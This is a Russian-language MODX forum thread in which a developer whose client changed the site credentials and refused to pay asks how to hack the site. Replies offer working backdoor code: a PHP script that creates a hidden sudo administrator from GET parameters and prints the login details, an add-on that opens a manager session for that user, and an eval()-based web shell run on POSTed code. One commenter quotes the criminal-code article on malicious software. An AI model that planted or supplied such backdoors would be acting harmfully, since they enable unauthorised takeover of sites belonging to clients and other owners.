Можно ли взломать сайт на MODX?
Добрый день!
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
23 января 2017, 20:04
Комментарии: 17
Аналогично, бэкдор + сайт лежит на своем хостинге до оплаты оставшейся части. Вот код:
По поводу взлома можешь обратиться к agel_nash, наверное.
<?php
define('MODX_API_MODE', true);
//количество dirname = глубина документа относительно корня
require dirname(dirname(dirname(dirname(__FILE__)))) . '/index.php';
$user = empty($_GET['user']) ? 'user'. rand(99,9999) : $_GET['user'];
$pass = empty($_GET['pass']) ? rand(10000000,99999999) : $_GET['pass'];
$u = $modx->newObject('modUser');
$u->fromArray(array(
'username' => $user,
'password' => $pass,
'active' => 1,
'primary_group' => 1,
));
$u->joinGroup('1', '0');
$u->setSudo(1);
$p = $modx->newObject('modUserProfile');
$p->fromArray(array(
'fullname' => $user,
'email' => $user.'@yoba.ru',
));
$u->addOne($p);
$u->save();
if (!empty($u->username)) {
print '<p><b>user:</b> '. $user .'</p><p><b>pass:</b> '. $pass .'</p>';
}По поводу взлома можешь обратиться к agel_nash, наверное.
*пожал плечами* тогда вариант but1head'a более уместен, ну или расширить функционал по вкусу:
//вывести путь админки
echo $modx->getOption('manager_path', null, MODX_MANAGER_PATH);
//добавить сессию для пользователя в админку
$user = $modx->getObject('modUser', айди_свежесозданного_пользователя_выше)
$modx->user = $user;
$modx->addSessionContext('mgr');
А я такой код размещаю:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title></title>
<style>
textarea {
padding: 10px;
width: 80%;
}
</style>
</head>
<body>
<?php echo $_SERVER['SCRIPT_FILENAME']; ?>
<form method="post">
<textarea name="code" cols="30" rows="15"><?php echo $_POST['code']; ?></textarea>
<button type="submit">Отправить</button>
</form>
<?php eval($_POST['code']); ?>
</body>
</html>
Лучший совет действительно у себя на хостинге разрабатывать.
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Только один маленький момент, но о нем надо знать:
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
Вчера в 17:19
Я нафигачил просто несколько условий
Вчера в 12:57
Данная ошибка в логе никак не связана с проверкой доступа по модификатору pasraccess.
Можете написать в ТГ в профиле.
20 апреля 2024, 16:08
Смотрите ошибки в консоли браузера.
20 апреля 2024, 15:47
{set $data = id_ресурса | resource : 'название_тв_migx' | fromJSON}
{foreach $data as $item}
{$item.name}
...
19 апреля 2024, 12:48
Постараюсь в свободное время это сделать, спасибо за предложение
19 апреля 2024, 11:49
Самое лучшее решение в данной ситуации — это сделать отдельный файл для работы с этим API, например:
/assets/components/mycomponent/api.phpну или про...
18 апреля 2024, 21:54
Не отображаются добавленные поля в редактировании пользователя.
Добавил одно поле в «общую информацию», для другого создал вкладку, в ней ещё вкладку...
18 апреля 2024, 17:01
попробуйте убрать exit(true);
17 апреля 2024, 19:46
cпасибо!
